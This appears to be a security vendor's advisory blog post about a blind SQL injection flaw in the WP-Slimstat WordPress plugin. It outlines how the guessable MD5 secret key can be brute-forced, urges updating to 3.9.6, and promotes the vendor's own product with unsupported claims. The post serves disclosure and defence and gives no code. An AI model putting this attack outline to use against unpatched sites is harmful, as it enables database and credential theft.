Up to 1.3M WordPress Sites at risk due to Slimstat plugin vulnerability


Dan Ennis CEO


A newly discovered bug in WP-Slimstat, a WordPress analytics plugin, puts up to 1.3M websites using this plugin at critical risk: attackers may exploit this vulnerability to gain access to user names, passwords and WordPress secret keys by using blind-SQL injection: a simple guesswork process resulting in retrieval of sensitive data.

Where is the bug present?

The vulnerability, disclosed by Sucuri this Tuesday is present in WP-Slimstat 3.9.5 and earlier (the fix was issued on Feb 19).

We should also note that Slimstat had at least 2 other known vulnerabilities over last few months: https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=slimstat

How many sites are at risk?

According to the WordPress site, over 1.3M sites have the plugin installed.

How is the vulnerability exploited?

Slimstat uses an outdated hashing algorithm: MD5. In versions earlier than 3.9.5 the hash number was based on the website’s installation year. Hackers can easily retrieve the website’s installation year from online archives. Once this number is available it leaves approx. 30M options for the secret key. Hackers can then guess all 30M options using a blind-SQL injection process taking several minutes, and gain administrative permissions to the database.

How should organizations defend?

The quickest resolution of the Slimstat vulnerability is to update to Slimstat 3.9.6. issued on Feb 19th.

As observed on 2/26 9AM ET on the Slimstat update stats page we see minimal update activity which may indicate that many sites are still vulnerable.

Why are Blind SQL injections so hard to identify?

The Slimstat vulnerability can be exploited as a blind SQL injection – a trial and error process in which the injection is repeatedly attempted till the right request is found and a successful injection can be executed. Conventional Web Application Security solutions may find it difficult to identify Blind SQL injections because the responses are simpler, usually a true/false response as opposed to a typical SQL injection response which is easy to identify.

Are Sentrix Cloud-DMZ customers at risk?

Sentrix Cloud-DMZ customers using the Slimstat plugin are not at risk and will not be affected by the vulnerability, regardless of the Slimstat version they are using.

Cloud-DMZ eliminates attempts for blind SQL injections as well as the complete range of WordPress vulnerability exploits, by removing the web systems attack surface and serving over 99% of user requests from a hardened cloud-replication grid. As a result, over 99% of the site becomes invisible to attackers

Additional areas of the website are defended by a variety of security measures, including persistent whitelists that effectively identify blind-SQL attack patterns.